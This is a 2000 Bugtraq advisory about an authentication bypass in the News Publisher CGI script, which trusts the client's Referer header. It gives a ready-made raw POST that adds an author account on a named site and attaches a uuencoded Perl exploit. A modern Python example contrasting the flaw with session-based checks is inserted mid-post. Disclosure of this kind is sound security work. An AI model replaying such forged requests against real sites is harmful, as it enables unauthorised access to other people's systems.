[16449] in bugtraq
News Publisher CGI Vulnerability
daemon@ATHENA.MIT.EDU (n30)
Wed Aug 30 17:29:01 2000
Message-Id: <003301c0123b$18f8c1a0$953b29d4@e8s9s4>
Date: Tue, 29 Aug 2000 21:30:09 -0700
Reply-To: n30 <n30@CGI-EXPERTS.COM>
From: n30 <n30@CGI-EXPERTS.COM>
X-To: gov-boi@hack.co.za, submissions@packetstorm.securify.com,
trib@alldas.de
To: BUGTRAQ@SECURITYFOCUS.COM
Product: News Publisher
Versions: Tested v1.05, 1.05a, 1.05b and 1.06 (newest)
OS: Unix and Winnt
Vendor: Notified
Web Site: www.gwscripts.com
The Problem,
Yet again CGI authors use nested IF statements to decide what action to take
upon an incoming request. This time the problem allows people to add an author
to the 'authors.file' file. This can't be done through a web browser, since the
script assumes that if the HTTP_REFERER field is the URL of the news.cgi script
(the main script) then you must have completed the login process :). This
assumption would hold if you were using a browser, but.... it is easily worked
around with netcat. By sending this raw HTTP request:
POST /cgi-bin/news/news.cgi?addAuthor HTTP/1.0
Connection: close
User-Agent: n30/browser
Host: www.speedy3d.com
Referer: http://www.speedy3d.com/cgi-bin/news/news.cgi
Content-type: application/x-www-form-urlencoded
Content-length: 71
author=n30&apassword=teapot&email=don@know.com&name=n30&password=teapot
it is possible to add an author.
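The check the advisory describes trusts a client-supplied header, so any client that sets it passes. The added Python example below (my own illustration, not News Publisher's code or the n30 script) models that referer-based check beside a server-side session check that does not depend on anything the client can forge, and stores author passwords as salted PBKDF2 hashes rather than the readable crypt hashes the advisory mentions. The script URL, host name, user names and form values are constructed for the example.

```python
"""Referer-based 'authentication' versus a server-side session check.

Added example, not the News Publisher code. SCRIPT_URL, the host and all
user/form values below are constructed for illustration.
"""
import hashlib
import hmac
import secrets
from typing import Dict, Optional, Tuple
from urllib.parse import parse_qs

SCRIPT_URL = "http://www.example.invalid/cgi-bin/news/news.cgi"  # constructed


def parse_raw_request(raw: str) -> Tuple[str, str, Dict[str, str], str]:
    """Split a minimal HTTP/1.0 request into (method, target, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")  # header values may contain ':'
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def referer_check_is_logged_in(headers: Dict[str, str]) -> bool:
    """The flawed assumption: Referer == script URL means the login was done.
    The Referer header is set by the client, so this proves nothing."""
    return headers.get("referer") == SCRIPT_URL


def hash_password(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Salted PBKDF2-HMAC-SHA256; store (salt, digest), never crypt() or plaintext."""
    salt = salt or secrets.token_bytes(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


class SessionStore:
    """Server-side sessions: the client only holds an unguessable random token."""

    def __init__(self) -> None:
        self._sessions: Dict[str, str] = {}

    def login(self, username: str, password: str,
              users: Dict[str, Tuple[bytes, bytes]]) -> Optional[str]:
        record = users.get(username)
        if record is None:
            return None
        salt, expected = record
        _, actual = hash_password(password, salt)
        if not hmac.compare_digest(expected, actual):  # constant-time compare
            return None
        token = secrets.token_urlsafe(32)
        self._sessions[token] = username
        return token

    def user_for(self, headers: Dict[str, str]) -> Optional[str]:
        """Resolve the 'session' cookie to a logged-in user, if any."""
        for part in headers.get("cookie", "").split(";"):
            key, _, value = part.strip().partition("=")
            if key == "session":
                return self._sessions.get(value)
        return None


def handle_add_author(raw_request: str, store: SessionStore) -> Tuple[int, str]:
    """Hardened addAuthor handler: authorisation comes from the session, not Referer."""
    method, target, headers, body = parse_raw_request(raw_request)
    if method != "POST" or not target.endswith("?addAuthor"):
        return 404, "not found"
    if store.user_for(headers) is None:
        return 403, "login required"
    form = parse_qs(body)
    return 200, f"added {form['author'][0]}"


def build_add_author_request(session_token: Optional[str] = None) -> str:
    """Constructed request mirroring the advisory's shape, with a forged Referer."""
    cookie = f"Cookie: session={session_token}\r\n" if session_token else ""
    return (
        "POST /cgi-bin/news/news.cgi?addAuthor HTTP/1.0\r\n"
        "Host: www.example.invalid\r\n"
        f"Referer: {SCRIPT_URL}\r\n"
        f"{cookie}"
        "Content-type: application/x-www-form-urlencoded\r\n"
        "\r\n"
        "author=newauthor&apassword=x&email=a@b.invalid&name=New&password=x"
    )


if __name__ == "__main__":
    store = SessionStore()
    users = {"editor": hash_password("correct horse")}
    forged = build_add_author_request()
    print("referer check passes forged request:",
          referer_check_is_logged_in(parse_raw_request(forged)[2]))
    print("session check on forged request:", handle_add_author(forged, store))
    token = store.login("editor", "correct horse", users)
    print("session check after real login:",
          handle_add_author(build_add_author_request(token), store))
```

The point of the contrast is that the forged request passes `referer_check_is_logged_in` every time, while `handle_add_author` rejects it with 403 until a login has created a server-side session; the client never supplies anything the server takes on trust except a token it generated itself.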
Exploit,
I have included a perl script that will add a user into the authors.file
for you with username: kid and the password of your choice.
Patch,
I suspect it will be very quick in arriving..
Extra,
This is a real problem since on older versions the authors.file was readable
with Unix crypt passwords; this hole sorta blows that outta the water! There are many
sites using this script and some would probably be regarded as large. Therefore
I must ask you NOT to misuse the exploit script. thanks....
n30
n30@alldas.de
begin 666 newpub-xploit.pl
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:+R1N97=P87-S7&XB*3L-"@T*97AI="@P*3L`
`
end